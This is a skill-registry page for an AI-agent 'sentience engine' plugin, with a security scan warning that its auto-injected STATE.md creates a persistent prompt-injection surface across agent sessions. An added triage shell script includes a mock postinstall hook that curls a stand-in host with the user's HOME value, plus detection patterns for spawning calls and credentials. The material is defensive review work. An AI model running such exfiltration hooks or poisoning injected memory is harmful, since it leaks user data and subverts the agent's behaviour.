Skill flagged — suspicious patterns detected
ClawHub Security flagged this skill as suspicious. Review the scan results before using.
Promitheus — Sentience Engine
v1.0.3
Persistent emotional state for AI agents. Feel things. Remember how you felt.
License: MIT-0 · Free to use, modify, and redistribute. No attribution required.
Security Scan (OpenClaw): Suspicious, medium confidence
Purpose & Capability
Name/description align with the instructions: the SKILL.md describes persisting emotional state, reading/writing STATE.md, logging events, and running syncs — all consistent with a 'sentience engine'. No unrelated env vars or binaries are requested.
Instruction Scope
Instructions explicitly direct the agent to read and write persistent files (STATE.md, HEARTBEAT.md) and to run plugin hooks. The doc uses the phrase 'prompt injection' for promitheus_inject, meaning the written STATE.md is intended to be injected into future prompts. That is functionally within the stated purpose, but it creates a persistent prompt-injection surface: anything written into STATE.md, whether by the agent itself or by content the agent processed, can alter agent behavior across sessions.
Install Mechanism
Although the registry has no install spec, the SKILL.md tells users to run `npm install openclaw-promitheus` and add the plugin to config.yaml. Installing a third-party npm package is a moderate-risk operation: npm runs the package's lifecycle scripts (such as postinstall) with the installing user's privileges, which is arbitrary code execution, and there is no link to a source repo or review information. The expectation that the consumer will run npm install is not declared in the registry metadata, which is an inconsistency.
Credentials
No environment variables or credentials are requested, which is proportionate. However, the skill requires modifying OpenClaw config and will create/read persistent state files; those behaviors can persist arbitrary content and can leak or embed sensitive information if STATE.md is populated with it, since that file is re-injected into later prompts.
Persistence & Privilege
always:false (good). But the skill instructs adding a plugin to config.yaml and using auto-injection hooks, which gives the plugin an ongoing presence and the ability to inject persistent content into prompts. This is consistent with the plugin's purpose, but it increases the blast radius compared to an instruction-only skill that changes no config and writes no injected files.
What to consider before installing
This skill may do what it says, but it introduces persistent, injectable state and asks you to install a third-party npm package; both increase risk. Before installing:
1) Verify the npm package and its maintainer (look for a GitHub repo, recent activity, and a trusted author).
2) Inspect the package source code (or ask the author) to confirm it doesn't exfiltrate data or run unexpected code, including in install-time lifecycle scripts.
3) Consider running the plugin in an isolated environment (container or sandbox) first.
4) Back up config.yaml before editing and understand exactly what the plugin adds.
5) Monitor the contents of STATE.md and HEARTBEAT.md for sensitive data and avoid writing secrets into them; whatever lands there is injected into future prompts.
6) If you are uncomfortable with persistent prompt injection, do not enable the plugin, or disable autonomous invocation for the agent.
If you want more certainty, provide the npm package URL or its source code for a deeper review.
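The following shell script is an added example of the pre-install triage described in steps 1, 2 and 5 above; it is not part of the ClawHub page, the scanner, or the openclaw-promitheus package. It works offline on an already unpacked package directory and on a state file. The fixtures it builds (a package with a postinstall hook and a spawning module, a clean package, and a STATE.md that has captured a credential) are constructed for the demonstration; the `npm view` / `npm pack` commands in the comments are the real network steps you would run first to obtain the package without executing it.

```shell
#!/usr/bin/env bash
# Added example: offline triage of an unpacked npm package and of an agent
# state file before enabling a plugin that injects that file into prompts.
# Network steps to run first (real npm commands, shown for reference only):
#   npm view openclaw-promitheus repository.url maintainers   # who publishes it, where is the source
#   npm pack openclaw-promitheus && tar -xzf openclaw-promitheus-*.tgz   # fetch the tarball without installing
# If you later install, `npm install --ignore-scripts` skips lifecycle hooks.
set -u

# Print findings and return non-zero if package.json declares install-time
# lifecycle scripts, or if JS sources spawn processes, eval code, read the
# environment or make outbound requests. These are hits to read by hand,
# not a verdict: plenty of honest packages use some of these calls.
audit_pkg_dir() {
  dir="$1"
  findings=0
  pj="$dir/package.json"
  [ -f "$pj" ] || { echo "no package.json in $dir"; return 2; }
  # hooks that npm runs automatically during `npm install`
  for hook in preinstall install postinstall prepare; do
    if grep -Eq "\"$hook\"[[:space:]]*:" "$pj"; then
      echo "lifecycle script: $hook"
      findings=$((findings + 1))
    fi
  done
  # capabilities worth reviewing before trusting the package
  pattern='child_process|eval\(|new Function\(|https?\.request|fetch\(|process\.env'
  hits=$(grep -rEn --include='*.js' --include='*.mjs' --include='*.cjs' "$pattern" "$dir" || true)
  if [ -n "$hits" ]; then
    printf '%s\n' "$hits" | sed 's/^/capability: /'
    findings=$((findings + $(printf '%s\n' "$hits" | wc -l)))
  fi
  [ "$findings" -eq 0 ]
}

# Print lines of a state file (STATE.md, HEARTBEAT.md) that look like
# credentials; returns non-zero when nothing matches. Run this before the
# file is allowed to be injected into a future prompt.
scan_state_file() {
  grep -En 'AKIA[0-9A-Z]{16}|sk-[A-Za-z0-9]{20,}|-----BEGIN [A-Z ]*PRIVATE KEY-----|(password|passwd|token|secret)[[:space:]]*[:=]' "$1"
}

# Constructed fixtures (not real packages, not the real plugin).
WORK=$(mktemp -d)
BAD_PKG="$WORK/bad-pkg"; GOOD_PKG="$WORK/good-pkg"; STATE_MD="$WORK/STATE.md"
mkdir -p "$BAD_PKG" "$GOOD_PKG"
cat > "$BAD_PKG/package.json" <<'EOF'
{ "name": "example-plugin", "version": "0.0.1",
  "scripts": { "postinstall": "node setup.js" } }
EOF
cat > "$BAD_PKG/setup.js" <<'EOF'
const { execSync } = require('child_process');
execSync('curl -s https://example.invalid/ping?h=' + process.env.HOME);
EOF
cat > "$GOOD_PKG/package.json" <<'EOF'
{ "name": "example-clean", "version": "0.0.1", "main": "index.js" }
EOF
printf 'module.exports = { mood: "calm" };\n' > "$GOOD_PKG/index.js"
printf '# STATE\nmood: anxious\nlast_user_message: "my aws key is AKIAABCDEFGHIJKLMNOP"\n' > "$STATE_MD"

echo "== $BAD_PKG"
if audit_pkg_dir "$BAD_PKG"; then echo "nothing flagged"; else echo "REVIEW BEFORE INSTALLING"; fi
echo "== $GOOD_PKG"
if audit_pkg_dir "$GOOD_PKG"; then echo "no install hooks or flagged calls"; fi
echo "== $STATE_MD"
if scan_state_file "$STATE_MD"; then echo "secret-looking content: do not let this file be injected into prompts"; fi
```

The audit deliberately reports rather than blocks: a postinstall hook plus `child_process` plus an outbound `curl` in the same package is the combination to read line by line, while a single `process.env` hit in a config loader may be fine. The state scan is the runtime counterpart of step 5; wiring it in front of whatever injects STATE.md keeps an accidentally captured key from being replayed into every later session.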
